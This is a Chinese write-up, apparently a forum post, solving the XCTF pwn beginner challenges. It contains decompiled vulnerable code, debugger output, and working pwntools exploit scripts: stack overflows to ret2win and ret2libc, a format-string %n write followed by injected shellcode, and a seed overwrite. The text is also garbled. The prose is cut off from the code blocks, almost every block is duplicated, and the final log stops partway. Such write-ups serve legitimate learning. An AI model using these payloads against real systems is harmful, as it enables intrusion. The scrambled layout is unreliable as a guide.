[原创]XCTF攻防世界-pwn新手练习区全部十题解析
发表于: 2021-5-14 00:34 14392
最近在看《CTF权威指南-pwn篇》,有时候觉得一道题目的exp和知识点都看懂了,实际上体会不深,可能过几天就全忘了。所以我选择做真题来加深对知识的理解。这里,使用攻防世界的所有pwn新手题来温习一些基本的利用方式。
p.s. 攻防世界创建在线场景一直失败,真是醉了
主要逻辑如下:
典型的ret2win,变量位于.bss段:
直接溢出获取flag:
因为比较时是按小端序读取数据的,所以需要把字符串反转过来。第一题简单是预想之内的情况,不知道接下来是什么难度。
简单栈溢出,主要流程如下:
这里直接ret2到具体调用system的地方:
脚本:
题目提示rop,然而我直接ret2libc:
脚本如下:
看了下其他人写的wp,似乎rop提示对应的是x64版本的程序,因为x64环境下的传参方式从栈传递变成了寄存器rdi,rsi,rcx,rdx,r8,r9传参,所以调用system时需要特殊gadget(pop rdi)将字符串/bin/sh赋给rdi的形式构造参数。
程序流程比较长,这里笔者长话短说,简单说明一下程序的情况:首先有个alarm会结束程序运行,使用sed -i s/alarm/isnan/g ./1d3c852354df4609bf8e56fe8e9df316
将其直接替换掉1。
安全机制如下:
保护开得很全,程序最后mmap了一段内存,读入我们的输入后直接跳过去执行:
需要使用它的格式化字符串漏洞将堆上的首个数据设置成0x55:
在调试中调用printf时栈情况如下:
栈中第二个参数为之前输入的地址数据,那么在x64环境中使用"%7$n"去定位Heap[0],py如下:
这题很简单:
程序从/dev/urandom2中取出随机数作为种子,生成十个随机数让我们猜测,猜对十个随机数即可获胜。这里有一个知识点是当seed固定时,之后生成的随机数都是一样的:
可以观察下面的输出:
从而我们可以利用程序的缓冲区溢出覆盖掉seed的值:
脚本如下:
效果:
题目关键点如下:
有个巨大问题是居然使用al赋给变量值:
所以这可以利用整数溢出的方式,构造261个长度的密码并调试到这一行指令:
构造py:
效果:
程序关键点如下:
gets存在栈溢出危险,我们直接ret到pwn函数中的call system,借用name作为参数'/bin/sh',编写py:
额和名字一样运行就拿shell了:
这题目《ctf竞赛权威指南》上有很相似的例子(page 80),总之就是泄露libc的地址,然后再调用system:
这里参考了大佬的博文更换程序libc3,但运行时还是会报错,索性直接把libc换了然后动态加载器执行:
然后用我的exp就成功执行了,反正可以模拟远程连接的环境也就行了:
一个典型的字符串格式化漏洞,需要我们修改某个变量的值:
gdb调试:
在第十个位置上存放我们的字符串,据此编写exp:
// IDA decompiler output of the challenge binary's main().
// Buf_601068 and target_60106C are adjacent .bss globals (0x601068 and 0x60106C
// in the data listing below), so a 0x10-byte read starting at Buf_601068 runs
// past the buffer and overwrites target_60106C. A defensive build would bound
// the read by the buffer's own size, not by a fixed 16.
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
    alarm(0x3Cu);
    setbuf(stdout, 0LL);
    puts("~~ welcome to ctf ~~ ");
    puts("lets get helloworld for bof");
    read(0, &Buf_601068, 0x10uLL);
    // Multi-character constant: compared as a 4-byte little-endian value, so the
    // bytes in memory must appear reversed ("aaun", as the run below shows).
    if ( target_60106C == 'nuaa' )
        sub_400686();
    return 0LL;
}
// "Win" function: only reachable when the global compare in main() succeeds.
// The command is a fixed literal, so nothing user-controlled reaches system();
// the weakness is the overflow in main() that lets an attacker pass the check.
__int64 sub_400686()
{
    system("cat flag.txt");
    return 0LL;
}
// IDA decompiler output of the challenge binary's main().
// Buf_601068 and target_60106C are adjacent .bss globals (0x601068 and 0x60106C
// in the data listing below), so a 0x10-byte read starting at Buf_601068 runs
// past the buffer and overwrites target_60106C. A defensive build would bound
// the read by the buffer's own size, not by a fixed 16.
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
    alarm(0x3Cu);
    setbuf(stdout, 0LL);
    puts("~~ welcome to ctf ~~ ");
    puts("lets get helloworld for bof");
    read(0, &Buf_601068, 0x10uLL);
    // Multi-character constant: compared as a 4-byte little-endian value, so the
    // bytes in memory must appear reversed ("aaun", as the run below shows).
    if ( target_60106C == 'nuaa' )
        sub_400686();
    return 0LL;
}
// "Win" function: only reachable when the global compare in main() succeeds.
// The command is a fixed literal, so nothing user-controlled reaches system();
// the weakness is the overflow in main() that lets an attacker pass the check.
__int64 sub_400686()
{
    system("cat flag.txt");
    return 0LL;
}
0000601068
?? Buf_601068 db ? ; ; DATA XREF: main
+
3B
↑o
.bss:
0000000000601069
?? db ? ;
.bss:
000000000060106A
?? db ? ;
.bss:
000000000060106B
?? db ? ;
.bss:
000000000060106C
?? ?? ?? ?? target_60106C dd ? ; DATA XREF: main
+
4A
↑r
0000601068
?? Buf_601068 db ? ; ; DATA XREF: main
+
3B
↑o
.bss:
0000000000601069
?? db ? ;
.bss:
000000000060106A
?? db ? ;
.bss:
000000000060106B
?? db ? ;
.bss:
000000000060106C
?? ?? ?? ?? target_60106C dd ? ; DATA XREF: main
+
4A
↑r
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ echo
'12345'
> flag.txt
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld
for
bof
1111nuaa
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld
for
bof
1111aaun
12345
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ echo
'12345'
> flag.txt
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld
for
bof
1111nuaa
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld
for
bof
1111aaun
12345
// Decompiled: classic stack overflow. The decompiler places buf at rbp-80h,
// yet read() accepts up to 0x200 bytes, so input past 0x80 bytes overwrites
// the saved frame pointer and return address. The fix is to pass the buffer's
// real size to read().
ssize_t vulnerable_function()
{
    char buf; // [rsp+0h] [rbp-80h]
    return read(0, &buf, 0x200uLL);
}
// Unreferenced helper left in the binary; it is the ret2win target because it
// already loads "/bin/sh" and calls system (see the .text listing below).
int callsystem()
{
    return system("/bin/sh");
}
// Decompiled: classic stack overflow. The decompiler places buf at rbp-80h,
// yet read() accepts up to 0x200 bytes, so input past 0x80 bytes overwrites
// the saved frame pointer and return address. The fix is to pass the buffer's
// real size to read().
ssize_t vulnerable_function()
{
    char buf; // [rsp+0h] [rbp-80h]
    return read(0, &buf, 0x200uLL);
}
// Unreferenced helper left in the binary; it is the ret2win target because it
// already loads "/bin/sh" and calls system (see the .text listing below).
int callsystem()
{
    return system("/bin/sh");
}
text:
0000000000400596
55
push rbp
.text:
0000000000400597
48
89
E5 mov rbp, rsp
.text:
000000000040059A
BF
84
06
40
00
mov edi, offset command ;
"/bin/sh"
<
-
-
-
-
-
-
.text:
000000000040059F
E8 BC FE FF FF call _system
.text:
00000000004005A4
5D
pop rbp
.text:
00000000004005A5
C3 retn
text:
0000000000400596
55
push rbp
.text:
0000000000400597
48
89
E5 mov rbp, rsp
.text:
000000000040059A
BF
84
06
40
00
mov edi, offset command ;
"/bin/sh"
<
-
-
-
-
-
-
.text:
000000000040059F
E8 BC FE FF FF call _system
.text:
00000000004005A4
5D
pop rbp
.text:
00000000004005A5
C3 retn
# Exploit script from the write-up. NOTE(review): Python 2 string semantics are
# assumed (the run logs use `python`); under Python 3 the str + bytes
# concatenation below would raise TypeError.
from pwn import *

context.log_level = "DEBUG"
io = process('291721f42a044f50a2aead748d539df0')
# Address in callsystem() right where edi is loaded with "/bin/sh" before
# call _system (see the .text listing above).
win_function = 0x40059A
# buf sits at rbp-80h, so 0x88 bytes of filler reach the saved return address.
payload = 'A' * 0x88 + p64(win_function)
io.recv()
# Debug aid only: attach gdb with the author's breakpoint and wait for Enter.
pwnlib.gdb.attach(io,gdbscript='''
break *0x4005C5
c
''')
pause()
io.send(payload)
io.interactive()
# Exploit script from the write-up. NOTE(review): Python 2 string semantics are
# assumed (the run logs use `python`); under Python 3 the str + bytes
# concatenation below would raise TypeError.
from pwn import *

context.log_level = "DEBUG"
io = process('291721f42a044f50a2aead748d539df0')
# Address in callsystem() right where edi is loaded with "/bin/sh" before
# call _system (see the .text listing above).
win_function = 0x40059A
# buf sits at rbp-80h, so 0x88 bytes of filler reach the saved return address.
payload = 'A' * 0x88 + p64(win_function)
io.recv()
# Debug aid only: attach gdb with the author's breakpoint and wait for Enter.
pwnlib.gdb.attach(io,gdbscript='''
break *0x4005C5
c
''')
pause()
io.send(payload)
io.interactive()
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ pwn checksec
1ab77c073b4f4524b73e086d063f884e
[
*
]
'/home/dc/playground/xctf_word/pwn/1ab77c073b4f4524b73e086d063f884e'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$
// Decompiled (i386 build; checksec above: no canary, NX on, no PIE).
// buf is at ebp-88h but read() accepts 0x100 bytes, so the saved ebp and
// return address are reachable. Bounding the read by the buffer size is the fix.
ssize_t vulnerable_function()
{
    char buf; // [esp+0h] [ebp-88h]
    system("echo Input:");
    return read(0, &buf, 0x100u);
}
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ pwn checksec
1ab77c073b4f4524b73e086d063f884e
[
*
]
'/home/dc/playground/xctf_word/pwn/1ab77c073b4f4524b73e086d063f884e'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$
// Decompiled (i386 build; checksec above: no canary, NX on, no PIE).
// buf is at ebp-88h but read() accepts 0x100 bytes, so the saved ebp and
// return address are reachable. Bounding the read by the buffer size is the fix.
ssize_t vulnerable_function()
{
    char buf; // [esp+0h] [ebp-88h]
    system("echo Input:");
    return read(0, &buf, 0x100u);
}
# Exploit script from the write-up (32-bit target). NOTE(review): Python 2 string
# semantics assumed, as with the other scripts on this page.
from pwn import *

context.log_level = "DEBUG"
io = process('./1ab77c073b4f4524b73e086d063f884e')
elf = ELF('./1ab77c073b4f4524b73e086d063f884e')
# Address of a "/bin/sh" string inside the binary, used as system's argument.
hit_binsh = 0x804A024
# buf is at ebp-88h: 0x8C bytes reach the return address, which becomes
# system's entry; the next 4 bytes are system's fake return address, then its
# first stack argument (the 32-bit cdecl layout).
payload = 'A' * 0x8C + p32(elf.sym['system']) + 'A' * 4 + p32(hit_binsh)
io.recv()
# Debug aid only: attach gdb with the author's breakpoint and wait for Enter.
pwnlib.gdb.attach(io,gdbscript='''
break *0x804847F
c
''')
pause()
io.send(payload)
io.interactive()
# Exploit script from the write-up (32-bit target). NOTE(review): Python 2 string
# semantics assumed, as with the other scripts on this page.
from pwn import *

context.log_level = "DEBUG"
io = process('./1ab77c073b4f4524b73e086d063f884e')
elf = ELF('./1ab77c073b4f4524b73e086d063f884e')
# Address of a "/bin/sh" string inside the binary, used as system's argument.
hit_binsh = 0x804A024
# buf is at ebp-88h: 0x8C bytes reach the return address, which becomes
# system's entry; the next 4 bytes are system's fake return address, then its
# first stack argument (the 32-bit cdecl layout).
payload = 'A' * 0x8C + p32(elf.sym['system']) + 'A' * 4 + p32(hit_binsh)
io.recv()
# Debug aid only: attach gdb with the author's breakpoint and wait for Enter.
pwnlib.gdb.attach(io,gdbscript='''
break *0x804847F
c
''')
pause()
io.send(payload)
io.interactive()
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ pwn checksec
1d3c852354df4609bf8e56fe8e9df316
[
*
]
'/home/dc/playground/xctf_word/pwn/1d3c852354df4609bf8e56fe8e9df316'
Arch: amd64
-
64
-
little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (
0x400000
)
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ pwn checksec
1d3c852354df4609bf8e56fe8e9df316
[
*
]
'/home/dc/playground/xctf_word/pwn/1d3c852354df4609bf8e56fe8e9df316'
Arch: amd64
-
64
-
little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (
0x400000
)
// Decompiled excerpt (the enclosing function is not shown). Guarded by a
// comparison of two heap values; once it is satisfied the program maps an
// anonymous page with prot 7 (read/write/execute), reads up to 0x100 bytes of
// user input into it and calls it. Executable anonymous memory that receives
// raw input bypasses NX entirely; prot should never include PROT_EXEC for
// buffers filled from untrusted input.
if ( *HEAP_1_D_2_U == HEAP_1_D_2_U[1] )
{
    puts("Wizard: I will help you! USE YOU SPELL");
    v1 = mmap(0LL, 0x1000uLL, 7, 33, -1, 0LL);
    read(0, v1, 0x100uLL);
    (v1)(0LL, v1);
}
// Decompiled excerpt (the enclosing function is not shown). Guarded by a
// comparison of two heap values; once it is satisfied the program maps an
// anonymous page with prot 7 (read/write/execute), reads up to 0x100 bytes of
// user input into it and calls it. Executable anonymous memory that receives
// raw input bypasses NX entirely; prot should never include PROT_EXEC for
// buffers filled from untrusted input.
if ( *HEAP_1_D_2_U == HEAP_1_D_2_U[1] )
{
    puts("Wizard: I will help you! USE YOU SPELL");
    v1 = mmap(0LL, 0x1000uLL, 7, 33, -1, 0LL);
    read(0, v1, 0x100uLL);
    (v1)(0LL, v1);
}
// Decompiled excerpt (the enclosing function is not shown). Two defects:
// scanf("%s") has no width limit, and the user's text is then passed to
// printf() as the format string itself. The safe form is printf("%s", format).
_isoc99_scanf("%ld", &v2);
puts("And, you wish is:");
_isoc99_scanf("%s", &format);
puts("Your wish is");
printf(&format, &format);
// Decompiled excerpt (the enclosing function is not shown). Two defects:
// scanf("%s") has no width limit, and the user's text is then passed to
// printf() as the format string itself. The safe form is printf("%s", format).
_isoc99_scanf("%ld", &v2);
puts("And, you wish is:");
_isoc99_scanf("%s", &format);
puts("Your wish is");
printf(&format, &format);
0x00007fffffffdb28
│
+
0x0000
:
0x0000000000400c83
→ mov edi,
0x401c23
← $rsp
0x00007fffffffdb30
│
+
0x0008
:
0x00000001f7dca2a0
0x00007fffffffdb38
│
+
0x0010
:
0x0000000000604260
→
0x0000005500000044
(
"D"
?)
0x00007fffffffdb40
│
+
0x0018
:
0x0000000078243125
(
"%1$x"
?) ← $rdi
0x00007fffffffdb48
│
+
0x0020
:
0x00007ffff7a6f4d3
→ <_IO_file_overflow
+
259
>
cmp
eax,
0xffffffff
0x00007fffffffdb50
│
+
0x0028
:
0x0000000000000022
("""?)
0x00007fffffffdb58
│
+
0x0030
:
0x00007ffff7dce760
→
0x00000000fbad2887
0x00007fffffffdb60
│
+
0x0038
:
0x0000000000401a68
→
"So, where you will go?east or up?:"
0x00007fffffffdb28
│
+
0x0000
:
0x0000000000400c83
→ mov edi,
0x401c23
← $rsp
0x00007fffffffdb30
│
+
0x0008
:
0x00000001f7dca2a0
0x00007fffffffdb38
│
+
0x0010
:
0x0000000000604260
→
0x0000005500000044
(
"D"
?)
0x00007fffffffdb40
│
+
0x0018
:
0x0000000078243125
(
"%1$x"
?) ← $rdi
0x00007fffffffdb48
│
+
0x0020
:
0x00007ffff7a6f4d3
→ <_IO_file_overflow
+
259
>
cmp
eax,
0xffffffff
0x00007fffffffdb50
│
+
0x0028
:
0x0000000000000022
("""?)
0x00007fffffffdb58
│
+
0x0030
:
0x00007ffff7dce760
→
0x00000000fbad2887
0x00007fffffffdb60
│
+
0x0038
:
0x0000000000401a68
→
"So, where you will go?east or up?:"
# Exploit script from the write-up. NOTE(review): Python 2 string semantics
# assumed, as with the other scripts on this page.
from pwn import *

context.arch = "amd64"
context.log_level = "DEBUG"
io = process('./1d3c852354df4609bf8e56fe8e9df316')
# The program prints two "secret" values; secret1 is reused below as the address
# handed back to the program.
io.recvuntil('secret[0] is ')
secret1 = int(io.recvuntil('\n'), 16)
io.recvuntil('secret[1] is ')
secret2 = int(io.recvuntil('\n'), 16)
log.info("%s %s" % (secret1,secret2))
io.recv()
io.sendline('noname')
io.recv()
io.sendline('east')
io.recv()
io.sendline('1')
io.recv()
#'Give me an address'
io.sendline(str(secret1))
io.recv()
# Format-string write: %085d emits 85 (0x55) characters and %7$n stores that
# count through the 7th argument slot, which the stack dump above shows holding
# the address supplied on the previous line.
io.sendline('%085d%7$n')
io.recv()
# Once the guard passes, the program reads into its rwx mapping and calls it.
io.send(asm(shellcraft.sh()))
io.interactive()
# Exploit script from the write-up. NOTE(review): Python 2 string semantics
# assumed, as with the other scripts on this page.
from pwn import *

context.arch = "amd64"
context.log_level = "DEBUG"
io = process('./1d3c852354df4609bf8e56fe8e9df316')
# The program prints two "secret" values; secret1 is reused below as the address
# handed back to the program.
io.recvuntil('secret[0] is ')
secret1 = int(io.recvuntil('\n'), 16)
io.recvuntil('secret[1] is ')
secret2 = int(io.recvuntil('\n'), 16)
log.info("%s %s" % (secret1,secret2))
io.recv()
io.sendline('noname')
io.recv()
io.sendline('east')
io.recv()
io.sendline('1')
io.recv()
#'Give me an address'
io.sendline(str(secret1))
io.recv()
# Format-string write: %085d emits 85 (0x55) characters and %7$n stores that
# count through the 7th argument slot, which the stack dump above shows holding
# the address supplied on the previous line.
io.sendline('%085d%7$n')
io.recv()
# Once the guard passes, the program reads into its rwx mapping and calls it.
io.send(asm(shellcraft.sh()))
io.interactive()
// Decompiled main() of the guess-number game.
// The seed comes from /dev/urandom, but it is stored at rbp-10h, only 0x20
// bytes above the unbounded gets() target `name` at rbp-30h (see the stack
// listing below). A name longer than 0x20 bytes therefore overwrites the seed,
// and with a known seed the ten rand() draws are fully predictable. Replacing
// gets() with a bounded read (fgets/read with sizeof) removes the bug.
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
    int input_num; // [rsp+4h] [rbp-3Ch]
    int index; // [rsp+8h] [rbp-38h]
    int rand_num; // [rsp+Ch] [rbp-34h]
    char name; // [rsp+10h] [rbp-30h]
    unsigned int seed[2]; // [rsp+30h] [rbp-10h]
    unsigned __int64 v9; // [rsp+38h] [rbp-8h]

    v9 = __readfsqword(0x28u); // stack-protector canary load
    setbuf(stdin, 0LL);
    setbuf(stdout, 0LL);
    setbuf(stderr, 0LL);
    input_num = 0;
    rand_num = 0;
    *seed = sub_BB0(); // 64-bit value truncated into seed[0]
    puts("-------------------------------");
    puts("Welcome to a guess number game!");
    puts("-------------------------------");
    puts("Please let me know your name!");
    printf("Your name:", 0LL);
    gets(&name); // no length limit: overwrites seed[] and beyond
    srand(seed[0]);
    for ( index = 0; index <= 9; ++index )
    {
        rand_num = rand() % 6 + 1;
        printf("-------------Turn:%d-------------\n", (index + 1));
        printf("Please input your guess number:");
        __isoc99_scanf("%d", &input_num);
        puts("---------------------------------");
        if ( input_num != rand_num )
        {
            puts("GG!");
            exit(1);
        }
        puts("Success!");
    }
    win_C3E();
    return 0LL;
}
// Seed source: reads 8 bytes from /dev/urandom. Only a negative read() result is
// treated as failure, so a short read would return partially-initialized stack
// data; the `fd > 0` test also skips close() if the descriptor happened to be 0.
__int64 sub_BB0()
{
    int fd; // [rsp+Ch] [rbp-14h]
    __int64 buf; // [rsp+10h] [rbp-10h]
    unsigned __int64 v3; // [rsp+18h] [rbp-8h]

    v3 = __readfsqword(0x28u); // stack-protector canary load
    fd = open("/dev/urandom", 0);
    if ( fd < 0 || read(fd, &buf, 8uLL) < 0 )
        exit(1);
    if ( fd > 0 )
        close(fd);
    return buf;
}
// Reward path reached after ten correct guesses; fixed command, no user input.
__int64 sub_C3E()
{
    printf("You are a prophet!\nHere is your flag!");
    system("cat flag");
    return 0LL;
}
// Decompiled main() of the guess-number game.
// The seed comes from /dev/urandom, but it is stored at rbp-10h, only 0x20
// bytes above the unbounded gets() target `name` at rbp-30h (see the stack
// listing below). A name longer than 0x20 bytes therefore overwrites the seed,
// and with a known seed the ten rand() draws are fully predictable. Replacing
// gets() with a bounded read (fgets/read with sizeof) removes the bug.
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
    int input_num; // [rsp+4h] [rbp-3Ch]
    int index; // [rsp+8h] [rbp-38h]
    int rand_num; // [rsp+Ch] [rbp-34h]
    char name; // [rsp+10h] [rbp-30h]
    unsigned int seed[2]; // [rsp+30h] [rbp-10h]
    unsigned __int64 v9; // [rsp+38h] [rbp-8h]

    v9 = __readfsqword(0x28u); // stack-protector canary load
    setbuf(stdin, 0LL);
    setbuf(stdout, 0LL);
    setbuf(stderr, 0LL);
    input_num = 0;
    rand_num = 0;
    *seed = sub_BB0(); // 64-bit value truncated into seed[0]
    puts("-------------------------------");
    puts("Welcome to a guess number game!");
    puts("-------------------------------");
    puts("Please let me know your name!");
    printf("Your name:", 0LL);
    gets(&name); // no length limit: overwrites seed[] and beyond
    srand(seed[0]);
    for ( index = 0; index <= 9; ++index )
    {
        rand_num = rand() % 6 + 1;
        printf("-------------Turn:%d-------------\n", (index + 1));
        printf("Please input your guess number:");
        __isoc99_scanf("%d", &input_num);
        puts("---------------------------------");
        if ( input_num != rand_num )
        {
            puts("GG!");
            exit(1);
        }
        puts("Success!");
    }
    win_C3E();
    return 0LL;
}
// Seed source: reads 8 bytes from /dev/urandom. Only a negative read() result is
// treated as failure, so a short read would return partially-initialized stack
// data; the `fd > 0` test also skips close() if the descriptor happened to be 0.
__int64 sub_BB0()
{
    int fd; // [rsp+Ch] [rbp-14h]
    __int64 buf; // [rsp+10h] [rbp-10h]
    unsigned __int64 v3; // [rsp+18h] [rbp-8h]

    v3 = __readfsqword(0x28u); // stack-protector canary load
    fd = open("/dev/urandom", 0);
    if ( fd < 0 || read(fd, &buf, 8uLL) < 0 )
        exit(1);
    if ( fd > 0 )
        close(fd);
    return buf;
}
// Reward path reached after ten correct guesses; fixed command, no user input.
__int64 sub_C3E()
{
    printf("You are a prophet!\nHere is your flag!");
    system("cat flag");
    return 0LL;
}
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ cat ten_rand_nums_.c
#include <stdio.h>
#include <stdlib.h> /* srand, rand */
/*
 * Demonstrates that a PRNG seeded with a fixed value replays the same
 * sequence on every run: prints the ten values rand() % 6 + 1 for seed 0.
 * Output format is "N " repeated ten times, no trailing newline.
 */
int main(void)
{
    srand(0);
    int remaining = 10;
    while (remaining-- > 0) {
        int roll = rand() % 6 + 1;
        printf("%d ", roll);
    }
    return 0;
}
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ cat ten_rand_nums_.c
#include <stdio.h>
#include <stdlib.h> /* srand, rand */
/*
 * Demonstrates that a PRNG seeded with a fixed value replays the same
 * sequence on every run: prints the ten values rand() % 6 + 1 for seed 0.
 * Output format is "N " repeated ten times, no trailing newline.
 */
int main(void)
{
    srand(0);
    int remaining = 10;
    while (remaining-- > 0) {
        int roll = rand() % 6 + 1;
        printf("%d ", roll);
    }
    return 0;
}
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ gcc ten_rand_nums_.c
-
o ten_rand_nums
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
ten_rand_nums
2
5
4
2
6
2
5
1
4
2
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
ten_rand_nums
2
5
4
2
6
2
5
1
4
2
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ gcc ten_rand_nums_.c
-
o ten_rand_nums
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
ten_rand_nums
2
5
4
2
6
2
5
1
4
2
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
ten_rand_nums
2
5
4
2
6
2
5
1
4
2
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$
-
0000000000000030
name db ?
-
000000000000002F
db ? ; undefined
-
000000000000002E
db ? ; undefined
-
000000000000002D
db ? ; undefined
-
000000000000002C
db ? ; undefined
-
000000000000002B
db ? ; undefined
-
000000000000002A
db ? ; undefined
-
0000000000000029
db ? ; undefined
-
0000000000000028
db ? ; undefined
-
0000000000000027
db ? ; undefined
-
0000000000000026
db ? ; undefined
-
0000000000000025
db ? ; undefined
-
0000000000000024
db ? ; undefined
-
0000000000000023
db ? ; undefined
-
0000000000000022
db ? ; undefined
-
0000000000000021
db ? ; undefined
-
0000000000000020
db ? ; undefined
-
000000000000001F
db ? ; undefined
-
000000000000001E
db ? ; undefined
-
000000000000001D
db ? ; undefined
-
000000000000001C
db ? ; undefined
-
000000000000001B
db ? ; undefined
-
000000000000001A
db ? ; undefined
-
0000000000000019
db ? ; undefined
-
0000000000000018
db ? ; undefined
-
0000000000000017
db ? ; undefined
-
0000000000000016
db ? ; undefined
-
0000000000000015
db ? ; undefined
-
0000000000000014
db ? ; undefined
-
0000000000000013
db ? ; undefined
-
0000000000000012
db ? ; undefined
-
0000000000000011
db ? ; undefined
-
0000000000000010
seed dd
2
dup(?)
-
0000000000000030
name db ?
-
000000000000002F
db ? ; undefined
-
000000000000002E
db ? ; undefined
-
000000000000002D
db ? ; undefined
-
000000000000002C
db ? ; undefined
-
000000000000002B
db ? ; undefined
-
000000000000002A
db ? ; undefined
-
0000000000000029
db ? ; undefined
-
0000000000000028
db ? ; undefined
-
0000000000000027
db ? ; undefined
-
0000000000000026
db ? ; undefined
-
0000000000000025
db ? ; undefined
-
0000000000000024
db ? ; undefined
-
0000000000000023
db ? ; undefined
-
0000000000000022
db ? ; undefined
-
0000000000000021
db ? ; undefined
-
0000000000000020
db ? ; undefined
-
000000000000001F
db ? ; undefined
-
000000000000001E
db ? ; undefined
-
000000000000001D
db ? ; undefined
-
000000000000001C
db ? ; undefined
-
000000000000001B
db ? ; undefined
-
000000000000001A
db ? ; undefined
-
0000000000000019
db ? ; undefined
-
0000000000000018
db ? ; undefined
-
0000000000000017
db ? ; undefined
-
0000000000000016
db ? ; undefined
-
0000000000000015
db ? ; undefined
-
0000000000000014
db ? ; undefined
-
0000000000000013
db ? ; undefined
-
0000000000000012
db ? ; undefined
-
0000000000000011
db ? ; undefined
-
0000000000000010
seed dd
2
dup(?)
# Exploit script from the write-up. NOTE(review): Python 2 string semantics
# assumed, as with the other scripts on this page.
from pwn import *

context.log_level = "DEBUG"
# Sequence produced by rand() % 6 + 1 after srand(0) (ten_rand_nums output above).
nums = [2,5,4,2,6,2,5,1,4,2]
io = process('./b59204f56a0545e8a22f8518e749f19f')
io.recv()
# `name` lies 0x20 bytes below seed[] on the stack and is filled by gets(), so
# 0x20 bytes of filler followed by four NUL bytes sets seed[0] to 0.
io.sendline('A' * 0x20 + '\x00' * 4)
for num in nums:
    io.recv()
    io.sendline(str(num))
io.recv()
# Exploit script from the write-up. NOTE(review): Python 2 string semantics
# assumed, as with the other scripts on this page.
from pwn import *

context.log_level = "DEBUG"
# Sequence produced by rand() % 6 + 1 after srand(0) (ten_rand_nums output above).
nums = [2,5,4,2,6,2,5,1,4,2]
io = process('./b59204f56a0545e8a22f8518e749f19f')
io.recv()
# `name` lies 0x20 bytes below seed[] on the stack and is filled by gets(), so
# 0x20 bytes of filler followed by four NUL bytes sets seed[0] to 0.
io.sendline('A' * 0x20 + '\x00' * 4)
for num in nums:
    io.recv()
    io.sendline(str(num))
io.recv()
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ python payload_b59204f56a0545e8a22f8518e749f19f.py
[
+
] Starting local process
'./b59204f56a0545e8a22f8518e749f19f'
argv
=
[
'./b59204f56a0545e8a22f8518e749f19f'
] : pid
5635
[DEBUG] Received
0x88
bytes:
'-------------------------------\n'
'Welcome to a guess number game!\n'
'-------------------------------\n'
'Please let me know your name!\n'
'Your name:'
[DEBUG] Sent
0x25
bytes:
00000000
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
│AAAA│AAAA│AAAA│AAAA│
*
00000020
00
00
00
00
0a
│····│·│
00000025
[DEBUG] Received
0x40
bytes:
'-------------Turn:1-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:2-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'5\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:3-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'4\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:4-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:5-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'6\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:6-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:7-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'5\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:8-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'1\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:9-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'4\n'
[DEBUG] Received
0x6c
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:10-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[
*
] Process
'./b59204f56a0545e8a22f8518e749f19f'
stopped with exit code
0
(pid
5635
)
[DEBUG] Received
0x5a
bytes:
'---------------------------------\n'
'Success!\n'
